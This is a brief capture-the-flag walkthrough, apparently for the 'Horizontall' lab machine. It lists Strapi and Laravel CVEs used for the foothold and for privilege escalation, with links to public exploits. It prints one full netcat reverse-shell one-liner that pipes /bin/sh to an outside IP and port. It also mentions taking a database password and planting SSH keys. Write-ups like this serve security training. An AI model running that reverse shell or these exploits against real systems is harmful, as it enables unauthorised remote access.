Horizontall

Enumeration

Ports and Services

Software Installed:

• Strapi CMS 3.0.0-beta.17.4
• Laravel v8 (PHP v7.4.18)

Nmap Scan Results:

Gobuster:

VHosts:

Gobuster - api=prod.hroizontall.htb:

Nikto:

/admin/init I can get version:

Initial Foothold

Strapi CMS 3.0.0-beta.17.4 is vulnerable to both a password reset as well as remote code execution vulnerability

• CVE-2019-18818
• CVE-2019-19609

Exploit-db has a python script that resets the admin password as well as allows for Remote Code to execute:
https://www.exploit-db.com/exploits/50239

Rev Shell:
Executed nc
CMD: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.53 8888

/tmp/f

Found password in
/opt/strapi/myapi/config/environments/development/database.json

Created and upload ssh key for strapi user

User.txt Proof Screenshot

Privilege Escalation

Port 8000 is hosting Laravel Framework:

This version of Laravel is vulnerable to RCE
CVE-2021-3129

https://github.com/nth347/CVE-2021-3129_exploit

Copied SSH key from strapi to root:

SSH as root:

RootScreenshot Here: